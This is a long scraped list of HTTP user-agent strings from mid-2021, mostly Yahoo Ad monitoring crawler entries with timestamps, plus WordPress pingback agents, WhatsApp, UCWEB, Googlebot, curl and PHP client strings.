https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626636403-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626566444-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626569253-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626578673-0 +WhatsApp/2.21.140.15 i +WordPress/5.7.2; https://ez-case.ru +WordPress/5.7.2; https://blogchain.com.ua +WordPress/5.7.2; https://animei.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626687658-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626701345-0 +Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot) +WordPress/5.7.2; http://cihanyurdaun.com; verifying pingback from 178.176.78.155 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626661285-10 +WhatsApp/2.21.15.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626725205-10 +WhatsApp/2.21.13.27 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626668527-0 +WhatsApp/2.21.15.7 A +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626722424-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626722482-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626727208-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 DareBoost +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Mobile Safari/537.36 PTST/210719.135513 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1626738683-60 +Apache-HttpClient/5.0.4 (Java/11.0.10) +Apache-HttpClient/4.5.10 (Java/11.0.11) +TuneIn Radio/18.1 (Android 17; GT-P5110; Java) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626740195-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626749605-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +facebookexternalhit/1.1 (+https://www.facebook.com/externalhit_uatext.php) +Apache-HttpClient/4.5.5 (Java/12.0.1) +WordPress/5.7.2; http://reshanurs.blog.upi.edu; verifying pingback from 85.26.232.58 +WordPress/5.7.2; https://somplaq.com +WordPress/4.8.17; https://www.dominick-boisjeol.com; verifying pingback from 87.241.247.125 +WordPress/5.1.10; http://carsonwyatt.com; verifying pingback from 83.149.46.109 +WordPress/4.5.24; http://www.candiedcrime.com; verifying pingback from 31.173.85.136 +WordPress/5.7.2; https://childrenoftheummah.com; verifying pingback from 85.26.233.224 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626746359-10 +WordPress/5.7.2; http://lesoutrali.com/gh +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626817688-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626817691-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626743491-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626752541-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626757834-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626757836-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626786116-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626786084-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626787043-0 +WhatsApp/2.21.14.24 A +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626790446-0 +HttpClient/1.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626795300-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626797860-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626800675-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626809962-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626812824-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 PTST/210719.135513 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Mobile Safari/537.36 PTST/210719.135513 +ddg_android/5.91.0 (com.duckduckgo.mobile.android; Android API 29) +Google pay +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626826245-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626834639-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626864820-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626864822-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626864833-10 +PHP/5.2.88 +PHP/6.3.84 +PHP/7.2.37 +PHP/6.2.32 +WordPress/5.7.2; http://selectgroup.com.ec; verifying pingback from 41.75.212.186 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626829343-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626892531-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626892546-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626830048-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626838300-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626863454-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626868021-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626879829-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626879826-0 +WhatsApp/2.21.15.10 A +WhatsApp/2.21.15.9 A +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Mobile Safari/537.36 PTST/210721.145320 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 5.1.2; SM-N900 ) U2/1.0.0 Mobile +Apache-HttpClient/4.5.9 (Java/1.8.0_302) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626913188-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626924621-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626951264-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626960666-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626974160-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626974221-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626981405-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626998366-0 +PHP/6.2.58 +PHP/5.3.11 +PHP/6.3.97 +PHP/6.2.08 +PHP/7.2.19 +WordPress/5.4.6; http://izodrom.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626914618-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626918950-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626918166-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626918949-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626925748-10 +WhatsApp/2.21.15.11 A +WhatsApp/2.2126.14 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626918716-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1626928977-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626951862-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626954714-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626955043-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626962984-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626962990-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626963793-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626972746-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626976896-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1626983832-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 PTST/210721.145320 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626974825-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Mobile Safari/537.36 PTST/210722.180444 +WordPress/5.8; https://cluster-shop.ru +WordPress/5.8; https://nail.avaloncosmetictattooing.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626974826-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626974825-60 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 5.1.2; SM-J701F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1626974826-10 +msnbot/2.0b +curl/7.78.0 +Snapchat/11.1.0.65 (iPhone12,1; iOS 13.7; gzip +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627004129-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627047698-0 +WordPress/5.8; https://isaacrobles.com +WordPress/5.7.2; https://nexiumgeneric.us.com +WordPress/5.7.2; http://giriprahasta.blog.upi.edu; verifying pingback from 36.68.53.133 +WordPress/5.8; http://samaracamps.com +PHP/5.3.99 +WordPress/5.6; http://goodstrategygroup.com; verifying pingback from 85.26.232.67 +WordPress/5.7.2; http://www.activexplore.com; verifying pingback from 178.176.76.26 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627004231-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627047236-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627051733-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627000191-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627000457-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627007518-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627049527-0 +WhatsApp/2.21.15.5 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 PTST/210722.180444 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/417.9 (KHTML, like Gecko) NetNewsWire/2.0.1 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 5.0.1; SM-N910H ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627001100-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627054232-0 +IBrowse/2.5.4demo (Amiga; AmigaOS 3.1.4; Build 25.96 68K) +TuneIn Radio/17.7 (Android 15; GT-P7510; Java) +Botbox TV/1.0 (Linux;Android 10.1) ExoPlayerLib/2.11.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627086107-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627095728-0 +PHP/7.3.49 +WordPress/5.8; https://wordpresshelper.org +WordPress/5.8; https://azironsupply.com; verifying pingback from 31.173.80.177 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627146471-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627089566-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627098118-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627104345-0 +WordPress.com; https://ri4m.wordpress.com +WordPress.com; https://taichikun-blog.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 10; M2006C3LG ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 6.0; SM-N900 ) U2/1.0.0 Mobile +WhatsApp/2.21.13.29 A +WordPress/5.8; https://www.researchmyname.com +Google-BYOID-Auth +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627179187-10 +WhatsApp/2.21.15.15 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627175840-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627184785-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627199927-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627225773-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627225774-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627227184-0 +WordPress/5.6.4; https://stock-machine.ir +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1627218158-60 +WordPress/5.8; https://loginwiz.com +WordPress/5.8; http://ilodge.xyz/2 +WordPress/5.8; https://fossnettr.com +WordPress/5.8; https://geekmindset.net +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 4.4.2; Micromax_Q4101 ) U2/1.0.0 Mobile +WordPress/5.7.2; http://zena.euweb.cz +WordPress/5.8; https://coloradoskiesacademy.org; verifying pingback from 178.176.78.123 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627271177-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627285744-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627310857-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627330959-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627260746-0 +WordPress/5.8; https://animei.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627270436-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627316210-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627332967-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627332968-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.5.5; https://gannewala.in +UNTRUSTED/1.0 UCWEB/2.0 (Java; U; MIDP-2.0; en-US; NokiaN73) U2/1.0.0 UCBrowser/9.4.1.377 U2/1.0.0 Mobile +WordPress/5.8; https://ranklaptop.com +Azureus 5.7.6.0;Windows 7;Java 1.8.0_281 +clark-crawler2/Nutch-1.19-SNAPSHOT +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627413511-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627421350-0 +PHP/5.2.29 +PHP/7.2.48 